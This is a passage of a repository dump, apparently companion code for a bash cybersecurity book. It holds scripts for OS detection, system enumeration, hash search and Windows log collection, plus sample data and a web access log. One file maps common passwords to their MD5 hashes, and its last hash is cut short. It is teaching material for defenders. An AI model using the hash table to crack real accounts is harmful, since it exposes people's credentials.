[
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2019 Cybersecurity Ops with bash\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "ch03/echoparams.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# echoparams.sh\n#\n# Description: \n# Demonstrates accessing parameters in bash\n#\n# Usage:\n# ./echoparms.sh <param 1> <param 2> <param 3>\n#\n\necho $#\necho $0\necho $1\necho $2\necho $3\n"
  },
  {
    "path": "ch03/osdetect.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# osdetect.sh\n#\n# Description: \n# Distinguish between MS-Windows/Linux/MacOS\n#\n# Usage: bash osdetect.sh\n#   output will be one of: Linux MSWin macOS\n#\n\nif type -t wevtutil &> /dev/null           # <1>\nthen\n    OS=MSWin\nelif type -t scutil &> /dev/null           # <2>\nthen\n    OS=macOS\nelse\n    OS=Linux\nfi\necho $OS\n"
  },
  {
    "path": "ch04/frost.txt",
    "content": "1    Two roads diverged in a yellow wood,\n2    And sorry I could not travel both\n3    And be one traveler, long I stood\n4    And looked down one as far as I could\n5    To where it bent in the undergrowth;\n6\n7 Excerpt from The Road Not Taken by Robert Frost\n"
  },
  {
    "path": "ch05/cmds.txt",
    "content": "#Linux Command   |MSWin  Bash |XML tag    |Purpose\n#----------------+------------+-----------+------------------------------\nuname -a         |uname -a    |uname      |O.S. version etc\ncat /proc/cpuinfo|systeminfo  |sysinfo    |system hardware and related info\nifconfig         |ipconfig    |nwinterface|Network interface information\nip route         |route print |nwroute    |routing table\narp -a           |arp -a      |nwarp      |ARP table\nnetstat -a       |netstat -a  |netstat    |network connections\nmount            |net share   |diskinfo   |mounted disks\nps -e            |tasklist    |processes  |running processes\n"
  },
  {
    "path": "ch05/cutfile.txt",
    "content": "12/05/2017 192.168.10.14 test.html\n12/30/2017 192.168.10.185 login.html\n"
  },
  {
    "path": "ch05/getlocal.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# getlocal.sh\n#\n# Description: \n# Gathers general system information and dumps it to a file\n#\n# Usage:\n# bash getlocal.sh < cmds.txt\n#   cmds.txt is a file with list of commands to run\n#\n\n# SepCmds - separate the commands from the line of input\nfunction SepCmds()\n{\n      LCMD=${ALINE%%|*}                   # <11>\n      REST=${ALINE#*|}                    # <12>\n      WCMD=${REST%%|*}                    # <13>\n      REST=${REST#*|}\n      TAG=${REST%%|*}                     # <14>\n      \n      if [[ $OSTYPE == \"MSWin\" ]]\n      then\n         CMD=\"$WCMD\"\n      else\n         CMD=\"$LCMD\"\n      fi\n}\n\nfunction DumpInfo ()\n{                                                              # <5>\n    printf '<systeminfo host=\"%s\" type=\"%s\"' \"$HOSTNAME\" \"$OSTYPE\"\n    printf ' date=\"%s\" time=\"%s\">\\n' \"$(date '+%F')\" \"$(date '+%T')\"\n    readarray CMDS                           # <6>\n    for ALINE in \"${CMDS[@]}\"                # <7>\n    do\n       # ignore comments\n       if [[ ${ALINE:0:1} == '#' ]] ; then continue ; fi     # <8>\n\n      SepCmds\n\n      if [[ ${CMD:0:3} == N/A ]]             # <9>\n      then\n          continue\n      else\n          printf \"<%s>\\n\" $TAG               # <10>\n          $CMD\n          printf \"</%s>\\n\" $TAG\n      fi\n    done\n    printf \"</systeminfo>\\n\"\n} \n\nOSTYPE=$(./osdetect.sh)                     # <1>\nHOSTNM=$(hostname)                          # <2>\nTMPFILE=\"${HOSTNM}.info\"                    # <3>\n\n# gather the info into the tmp file; errors, too\nDumpInfo  > $TMPFILE  2>&1                  # <4>\n\n"
  },
  {
    "path": "ch05/hashsearch.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# hashsearch.sh\n#\n# Description: \n# Recursively search a given directory for a file that\n# matches a given SHA-1 hash\n#\n# Usage:\n# hashsearch.sh <hash> <directory>\n#   hash - SHA-1 hash value to file to find\n#   directory - Top directory to start search\n#\n\nHASH=$1\nDIR=${2:-.}\t# default is here, cwd\n\n# convert pathname into an absolute path\nfunction mkabspath ()\t\t\t\t# <6>\n{\n    if [[ $1 == /* ]]\t\t\t\t# <7>\n    then\n    \tABS=$1\n    else\n    \tABS=\"$PWD/$1\"\t\t\t\t# <8>\n    fi\n}\n\nfind $DIR -type f |\t\t\t\t# <1>\nwhile read fn\ndo\n    THISONE=$(sha1sum \"$fn\")\t\t\t# <2>\n    THISONE=${THISONE%% *}\t\t\t# <3>\n    if [[ $THISONE == $HASH ]]\n    then\n\tmkabspath \"$fn\"\t\t\t\t# <4>\n\techo $ABS\t\t\t\t# <5>\n    fi\ndone\n"
  },
  {
    "path": "ch05/typesearch.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# typesearch.sh\n#\n# Description: \n# Search the file system for a given file type. It prints out the\n# pathname when found.\n#\n# Usage:\n# typesearch.sh [-c dir] [-i] [-R|r] <pattern> <path>\n#   -c Copy files found to dir\n#   -i Ignore case\n#   -R|r Recursively search subdirectories\n#   <pattern> File type pattern to search for\n#   <path> Path to start search\n#\n\nDEEPORNOT=\"-maxdepth 1\"\t\t# just the current dir; default\n\n# PARSE option arguments:\nwhile getopts 'c:irR' opt; do                         # <1>\n  case \"${opt}\" in                                    # <2>\n    c) # copy found files to specified directory\n\t       COPY=YES\n\t       DESTDIR=\"$OPTARG\"                             # <3>\n\t       ;;\n    i) # ignore u/l case differences in search\n\t       CASEMATCH='-i'\n\t       ;;\n    [Rr]) # recursive                                 # <4>\n        unset DEEPORNOT;;                             # <5>\n    *)  # unknown/unsupported option                  # <6>\n        # error mesg will come from getopts, so just exit\n        exit 2 ;;\n  esac\ndone\nshift $((OPTIND - 1))                                 # <7>\n\n\nPATTERN=${1:-PDF document}                            # <8>\nSTARTDIR=${2:-.}\t# by default start here\n\nfind $STARTDIR $DEEPORNOT -type f | while read FN     # <9>\ndo\n    file $FN | egrep -q $CASEMATCH \"$PATTERN\"          # <10>\n    if (( $? == 0 ))   # found one                    # <11>\n    then\n\t        echo $FN\n\t        if [[ $COPY ]]                               # <12>\n\t        then\n\t            cp -p $FN $DESTDIR                       # <13>\n\t        fi\n    fi\ndone\n\n"
  },
  {
    "path": "ch05/winlogs.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# winlogs.sh\n#\n# Description: \n# Gather copies of Windows log files\n#\n# Usage:\n# winlogs.sh [-z] [dir]\n#   -z   Tar and zip the output\n#   dir  Optional scratch directory for holding the log files\n\nTGZ=0\nif (( $# > 0 ))\t\t\t\t\t\t# <1>\nthen\n    if [[ ${1:0:2} == '-z' ]]\t\t\t\t# <2>\n    then\n\tTGZ=1\t# tgz flag to tar/zip the log files\n\tshift\n    fi\nfi\nSYSNAM=$(hostname)\nLOGDIR=${1:-/tmp/${SYSNAM}_logs}\t\t\t# <3>\n\nmkdir -p $LOGDIR\t\t\t\t\t# <4>\ncd ${LOGDIR} || exit -2\n\nwevtutil el | while read ALOG\t\t\t\t# <5>\ndo\n    ALOG=\"${ALOG%$'\\r'}\"\t\t\t\t# <6>\n    echo \"${ALOG}:\"\t\t\t\t\t# <7>\n    SAFNAM=\"${ALOG// /_}\"\t\t\t\t# <8>\n    SAFNAM=\"${SAFNAM//\\//-}\"\n    wevtutil epl \"$ALOG\" \"${SYSNAM}_${SAFNAM}.evtx\"\ndone\n\nif (( TGZ == 1 ))\t\t\t\t\t# <9>\nthen\n    tar -czvf ${SYSNAM}_logs.tgz *.evtx\t\t\t# <10>\nfi\n"
  },
  {
    "path": "ch06/accesstime.txt",
    "content": "0745,file1.txt,1\n0830,file4.txt,2\n0830,file5.txt,3\n"
  },
  {
    "path": "ch06/awkusers.txt",
    "content": "Mike Jones\nJohn Smith\nKathy Jones\nJane Kennedy\nTim Scott\n"
  },
  {
    "path": "ch06/book.json",
    "content": "{ <1>\n  \"title\": \"Cybersecurity Ops with bash\", <2>\n  \"edition\": 1,\n  \"authors\": [ <3>\n    {\n      \"firstName\": \"Paul\",\n      \"lastName\": \"Troncone\"\n    },\n    {\n      \"firstName\": \"Carl\",\n      \"lastName\": \"Albing\"\n    }\n  ]\n}\n"
  },
  {
    "path": "ch06/book.xml",
    "content": "<book title=\"Cybersecurity Ops with bash\" edition=\"1\"> <1>\n  <author> <2>\n    <firstName>Paul</firstName> <3>\n    <lastName>Troncone</lastName>\n  </author> <4>\n  <author>\n    <firstName>Carl</firstName>\n    <lastName>Albing</lastName>\n  </author>\n</book>\n"
  },
  {
    "path": "ch06/csvex.txt",
    "content": "\"name\",\"username\",\"phone\",\"password hash\"\n\"John Smith\",\"jsmith\",\"555-555-1212\",5f4dcc3b5aa765d61d8327deb882cf99\n\"Jane Smith\",\"jnsmith\",\"555-555-1234\",e10adc3949ba59abbe56e057f20f883e\n\"Bill Jones\",\"bjones\",\"555-555-6789\",d8578edf8458ce06fbc5bb76a58c5ca4"
  },
  {
    "path": "ch06/ips.txt",
    "content": "ip,OS\n10.0.4.2,Windows 8\n10.0.4.35,Ubuntu 16\n10.0.4.107,macOS\n10.0.4.145,macOS\n"
  },
  {
    "path": "ch06/passwords.txt",
    "content": "password,md5hash\n123456,e10adc3949ba59abbe56e057f20f883e\npassword,5f4dcc3b5aa765d61d8327deb882cf99\nwelcome,40be4e59b9a2a2b5dffb918c0e86b3d7\nninja,3899dcbab79f92af727c2190bbd8abc5\nabc123,e99a18c428cb38d5f260853678922e03\n123456789,25f9e794323b453885f5181f1b624d0b\n12345678,25d55ad283aa400af464c76d713c07ad\nsunshine,0571749e2ac330a7455809c6b0e7af90\nprincess,8afa847f50a716e64932d995c8e7435a\nqwerty,d8578edf8458ce06fbc5bb76a58c5c"
  },
  {
    "path": "ch06/procowner.txt",
    "content": "Process Owner;PID\njdoe;0\ntjones;4\njsmith;340\nmsmith;528\n"
  },
  {
    "path": "ch06/tasks.txt",
    "content": "\nImage Name;PID;Session Name;Session#;Mem Usage\nSystem Idle Process;0;Services;0;4 K\nSystem;4;Services;0;2,140 K\nsmss.exe;340;Services;0;1,060 K\ncsrss.exe;528;Services;0;4,756 K\n"
  },
  {
    "path": "ch06/user.txt",
    "content": "user,ip\njdoe,10.0.4.2\njsmith,10.0.4.35\nmsmith,10.0.4.107\ntjones,10.0.4.145\n"
  },
  {
    "path": "ch06/usernames.txt",
    "content": "1,jdoe\n2,puser\n3,jsmith\n"
  },
  {
    "path": "ch07/access.log",
    "content": "192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /fade.gif HTTP/1.1\" 200 1112 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /favicon.ico HTTP/1.1\" 404 503 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /index.html HTTP/1.1\" 200 6933 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /favicon.ico HTTP/1.1\" 404 504 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 
\"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81377 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42818 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47030 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /about.html HTTP/1.1\" 200 7042 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1\" 200 265418 \"http://192.168.0.35/about.html\" 
\"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19445 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /consulting.html HTTP/1.1\" 200 7269 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1\" 200 120188 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19445 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:11 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 
\"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /fade.gif HTTP/1.1\" 200 1113 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /favicon.ico HTTP/1.1\" 404 503 \"-\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"-\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET 
/uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81377 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19525 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47029 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42819 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] \"GET /support.html HTTP/1.1\" 200 6207 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/support.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:31 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/support.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /request-quote.html HTTP/1.1\" 200 7326 \"http://192.168.0.35/support.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) 
Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1\" 200 1386 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /products.html HTTP/1.1\" 200 7158 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26428 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38062 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/theme/mobile49c2.js?1490908488 
HTTP/1.1\" 200 3414 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19445 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:53 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1\" 200 47804 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1\" 200 7769 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1\" 200 20174 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) 
